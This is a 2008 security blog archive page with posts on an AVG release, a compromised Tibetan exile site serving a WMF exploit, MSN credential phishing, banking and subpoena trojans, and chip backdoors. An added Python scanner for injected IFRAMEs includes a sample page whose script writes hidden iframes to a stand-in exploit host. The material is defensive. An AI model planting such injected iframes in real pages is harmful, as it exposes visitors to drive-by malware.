Monthly Archive for "April 2008"
Antivirus admin on 24 Apr 2008
AVG releases Anti-Virus Free 8.0
Many of you may know AVG Anti-Virus, perhaps because you use the free or paid-for package to protect your machine from malicious intrusions. Today the company released an updated version of the free edition of its anti-virus software. AVG Anti-Virus Free 8.0 brings some significant changes over the previous version. First of all, the interface has been completely redesigned and now looks like the paid-for alternative. Another new addition is a version of LinkScanner, which integrates with your web browser and highlights links in search results …
Antivirus on 22 Apr 2008
Free AVG Antivirus Tool Enhances Protection - PC Magazine
PC Magazine - Apr 22, 2008: AVG's antivirus technology, the strongest element of the company's AVG Security Suite 8, got the VB100% award in Virus Bulletin's last three tests, …
Antivirus admin on 21 Apr 2008
Tibetan Issues Take Heavy Casualties in Malware and Exploits

Late last week, Trend Micro Senior Threat Researcher Paul Ferguson reported a Web site compromised with malicious JavaScript that sends visitors to a known Graphical Device Interface (GDI) exploit.
You may recall that this critical vulnerability gives a remote attacker complete control over a vulnerable system once a specially crafted .EMF or .WMF image file is rendered; the user does not have to run anything, merely view the image. The compromised site is the official Web site of the Tibetan government in exile.
Visitors to that site would unwittingly download an embedded malicious JavaScript:
- http://www.tibet.com/{BLOCKED}/tibet.js
A closer look at the script reveals that it refers to the following sites, which contain IFRAME tags pointing to malware files and the GDI exploit:
- http://ad.{BLOCKED}.googlepages.com/ad02.jpg - the GDI/WMF exploit file, which Trend Micro detects as HTML_EXP.AZ
- http://ad.{BLOCKED}.googlepages.com/rm03.html - the obfuscated JS file, which is detected as HTML_EXP.AA
- http://ad.{BLOCKED}.googlepages.com/142.htm - the obfuscated Visual Basic script (VBScript), which is detected as VBS_VBSWGBASE.BH
Trend Micro detects the JS file, tibet.js, as HTML_IFRAME.OB.
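As an added example (not part of the original Trend Micro post), the following Python script flags the kind of injected content described above: script and IFRAME references that point off-site, frames that are hidden, and an "image" URL loaded as a frame rather than displayed with an IMG tag (the post's ad02.jpg is really a WMF exploit file). The hostnames, file names and sample page are constructed for illustration; the injected JavaScript is embedded inline in the sample rather than fetched from a separate tibet.js so that the script runs offline.

```python
"""Added example, not from the original post: flag injected IFRAME/script
references of the kind described above. Hosts, paths and the sample page are
constructed for illustration only."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# An "image" URL loaded as a frame rather than with <img> is suspicious in
# itself: the post describes a .jpg that is really a WMF exploit file.
IMAGE_EXTS = {".jpg", ".jpeg", ".gif", ".png", ".bmp", ".wmf", ".emf"}
# Plain (unobfuscated) iframe tags written out by a script, e.g. document.write.
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)


def _is_hidden(attrs):
    """Zero/one-pixel or CSS-hidden frames keep a drive-by out of sight."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    size = {attrs.get("width", ""), attrs.get("height", "")}
    return ("display:none" in style or "visibility:hidden" in style
            or bool(size & {"0", "1", "0px", "1px"}))


class InjectionScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []          # (kind, url, [reasons])
        self._script_buf = []       # body of the <script> being parsed
        self._in_script = False

    def _check(self, kind, src, attrs):
        url = urlparse(src)
        host = (url.hostname or self.page_host).lower()
        name = url.path.rsplit("/", 1)[-1].lower()
        ext = name[name.rfind("."):] if "." in name else ""
        reasons = []
        if host != self.page_host and not host.endswith("." + self.page_host):
            reasons.append("off-site host " + host)
        if kind.startswith("iframe") and _is_hidden(attrs):
            reasons.append("hidden frame")
        if kind.startswith("iframe") and ext in IMAGE_EXTS:
            reasons.append("image file loaded as a frame (%s)" % ext)
        if reasons:
            self.findings.append((kind, src, reasons))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self._check("script", a["src"], a)
        elif tag == "iframe" and a.get("src"):
            self._check("iframe", a["src"], a)

    def handle_data(self, data):
        if self._in_script:            # HTMLParser hands script bodies over raw
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag != "script":
            return
        self._in_script = False
        body = "".join(self._script_buf)
        self._script_buf = []
        # Re-parse each iframe tag the script writes out with a throwaway
        # scanner so the same checks apply to script-injected frames.
        for m in IFRAME_TAG.finditer(body):
            sub = InjectionScanner(self.page_host)
            sub.feed(m.group(0))
            sub.close()
            for _kind, src, reasons in sub.findings:
                self.findings.append(("iframe-from-script", src, reasons))


def scan(html, page_url):
    """Return the list of suspicious script/iframe references found in html."""
    scanner = InjectionScanner(urlparse(page_url).hostname or "")
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: an on-site page whose injected script writes two hidden
# off-site frames, plus a third-party tracker script that is flagged as a lead.
SAMPLE_URL = "http://www.example-compromised.org/index.html"
SAMPLE_PAGE = """<html><body>
<script src="/js/menu.js"></script>
<script>
document.write("<iframe src='http://ad.example-hosting.net/ad02.jpg' width=0 height=0></iframe>");
document.write("<iframe src='http://ad.example-hosting.net/rm03.html' style='display:none'></iframe>");
</script>
<iframe src="/embed/video.html" width="400" height="300"></iframe>
<script src="http://stats.example-tracker.net/t.js"></script>
</body></html>"""

if __name__ == "__main__":
    for kind, src, reasons in scan(SAMPLE_PAGE, SAMPLE_URL):
        print("%-19s %-45s %s" % (kind, src, "; ".join(reasons)))
```

Two caveats apply. An off-site reference is a lead, not a verdict: legitimate third-party trackers and ad networks are off-site too, so the output needs an analyst or a reputation list behind it. And the post notes that the injected JavaScript was obfuscated; a script that assembles the string `<iframe` from pieces or decodes it at run time defeats this static match, which is why sandboxed execution of the page is the next step when the static pass comes up empty.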
Clearly, cyber criminals still find issues concerning Tibet, China, and the Olympics to be hot topics. TrendLabs has documented a couple of such occurrences here and here.
One may take this as just another case of one party going head-to-head with an opposing party using malware. It is easy to point to hacktivists with political agendas, given the news that surfaced over the weekend of Chinese hackers supposedly launching a distributed denial-of-service attack. The attack was meant as a protest against CNN coverage deemed “pro-Tibet,” but it never transpired. Anti-CNN.com, a Chinese Web site created solely to expose the Western news company’s “biases,” urged street protests in European countries.
Though no connection between the anti-CNN movement and the supposed hacking incident was ever established, a team that had been investigating Chinese hackers believed the online attacks were meant to go hand-in-hand with the street protests. Think of it as a synchronized protest in the real and digital worlds. CNN has already released a statement regarding its Tibet coverage.
Chinese hackers did, however, manage to disrupt the SportsNetwork Web site, as reported here on TechCrunch.
Keep patches up to date to protect your systems from being exploited. At the same time, Trend Micro implores users to regularly update pattern files for improved system protection. Note that all related malicious Web sites are already blocked by the Content Security Team.
Antivirus admin on 21 Apr 2008
Curiosity is the Nourishment of Social Engineering
Do you know the story of a human and a monkey who lived in two rooms separated by a single door?
The story goes that after a while in that room the human grew curious and decided to find out what was happening behind the door. When he peeked through the keyhole, what he saw was another eye, apparently the monkey’s.
Cyber criminals can get maximum yield from the simplest of methods by exploiting human curiosity. How?
The first step is to send a spam email message. This message appears to have been sent through well-known botnet infrastructure.

The message above is in German but could be sent in any language. In English it reads: “With our completely free service, you can find out who blocked or deleted you in MSN.”
The link opens a Web site that invites the user to use the free service to check the validity of their MSN account.

All the user has to do here is “peek through the keyhole” by typing in the MSN account and the correct password to find out whether the account is “indeed blacklisted”. Of course no answer comes back… but what happens then?
If the data entered in these fields is valid, the user has in effect handed a working credential to the operators of the engellembul@gmail.com mailbox, where the form data is sent, for use in their next criminal actions.
This gives cyber criminals a free hand to use the unlawfully acquired data in any of their illicit activities. The hijacked MSN account can be used to send out spam and to distribute malware both through email and through the instant messaging application, MSN Messenger. Beyond that, the unauthorized user has access to the mailbox and can gather personal data about the affected user.
Antivirus admin on 21 Apr 2008
Brazilian Tragedy Used in Malware Attack
This week we received reports of a new malware attack that exploits a tragedy that occurred early this month: a five-year-old child was thrown out of a window. The police are investigating, and the latest reports say that all the evidence points to the parents as the ones responsible.
The attackers sent the spammed email message below, in which they promise a video with new and exclusive information about the case, including findings about who the suspects are.

Figure 1: Email message promising to reveal the responsible parties of the murder
The link in the mail has an obscured address (hxxp://83.x.x.136/terranoticias/index.html) that leads to a fake page imitating a large, legitimate ISP in Brazil (Terra Networks):

Figure 2: Fake page from a Legitimate Brazilian ISP
After the user clicks the link promising the video, the browser instead offers to download a file named verdade.com. Despite appearances, the .com suffix here is not a Web domain but the extension of a Windows executable.

Figure 3: Download dialog box
This file is detected by Trend Micro as TROJ_BANLOAD.EOZ. Users who have Trend Micro protection have been safe from this threat from the beginning, as Web Reputation Services (WRS) proactively recognizes the fake Web site.
Antivirus admin on 21 Apr 2008
Computer Virus Strikes San Diego Superior Court System
A computer virus that struck the San Diego Superior Court system last week has been identified and contained, but court computers continue to be shut down while the problem is fixed, officials said Monday. Court officials are asking the public for patience and are urging those who need information to have their court-issued paperwork, courtesy notices or tickets with them when they come to court. The "Win32/Zilcat.A" virus was first identified last week by anti-virus companies, and at the time there was no known cure. It has estimated t …
Antivirus admin on 17 Apr 2008
Also Hackable: Microprocessors
Researchers have recently demonstrated that a computer chip itself can be tampered with to give unauthorized users backdoor access to a system. Microprocessors now join the list of devices that can be hacked, following printers, digital photo frames, pacemakers, and even cars.
In a report by PC World, a microprocessor was backdoored by altering a small number of circuits on the chip. The modification lets malicious firmware be injected into the chip’s memory, which in turn enables an attacker to log in to the system as a legitimate user. Once in place, the attack is virtually undetectable to the affected user.
The researchers described possible attack scenarios, such as the malicious circuitry being added during chip development or modified chips being installed during computer assembly. Given recent trends this is quite plausible: the security of new hardware is no longer a certainty, with malware found pre-loaded on newly acquired devices such as USB keys, MP3 players, and even the celebrated iPod.
Given the resources required to pull off such an attack, this method might not end up being every hacker’s weapon of choice. But I reckon that, given the resources and the right circumstances, it will be someone’s choice, and then it would be like a robber getting his own set of keys to a house before the real owner even moves in.
Antivirus admin on 17 Apr 2008
Digital Certificates Not Always a Safety Guarantee
A digital certificate is an electronic credential, something like an ID card for the Web, that establishes who you are when doing business or other transactions online. Client certificates are used by many banks for secure online banking.
Unfortunately, hackers and phishers have quickly adapted to this security technique.
A recent phishing attack built around digital certificates targeted Bank of America customers. To access the Bank of America Direct login page, a client must have a valid digital certificate installed on their personal computer. The phishing URLs, in Rock Phish form, lead the user to a page asking them to create or download a digital certificate. In Internet Explorer, the page asks the user to run an ActiveX control presented as “Microsoft Certificate Enrollment Code.”

After running the add-on and filling in the requested information, the user is asked to download an .EXE file, sophialite.exe.


This is quite clever. Instead of an explicit login or confirmation page, which is easily recognized as phishing, the attackers have turned to the creation of digital certificates, a ploy that can actually convince users to take the bait. Another point: these URLs are in Rock Phish form, and so far we have seen 93 different domains using this technique. All are blocked by WCS (Trend’s Web Classification System for blocking malicious domains and URLs).
Antivirus admin on 17 Apr 2008
Bogus Subpoena Serves Up Trojans
In this recently reported targeted attack on the CEOs of various companies (also known as “whale phishing,” because of the size and stature of the affluent targets), a bogus subpoena attempts to trick recipients into clicking a link in the spammed email message. The link purports to give access to the court documents in the fictitious subpoena action.

Victims who click the malicious link in the email arrive at a Web site pretending to house the information (shown above) and are then prompted to download and install a browser plug-in to view the files.
The malicious “browser plug-in” (named Acrobat.exe in this instance) is actually TROJ_AGENT.AMAL.
The attack seems to work due to various social engineering techniques, each of which is not necessarily new.
The United States District Court has posted an advisory regarding these bogus subpoena requests, and so has the Internet Crime Complaint Center (IC3).
Anyone receiving such a request is thus advised to treat this solicitation with extreme caution. If there is reason to believe that the email is valid, consult the matter with your lawyer. Do not click on links in unsolicited email. Period.
Additional input from Paul Ferguson, Advanced Threats Research


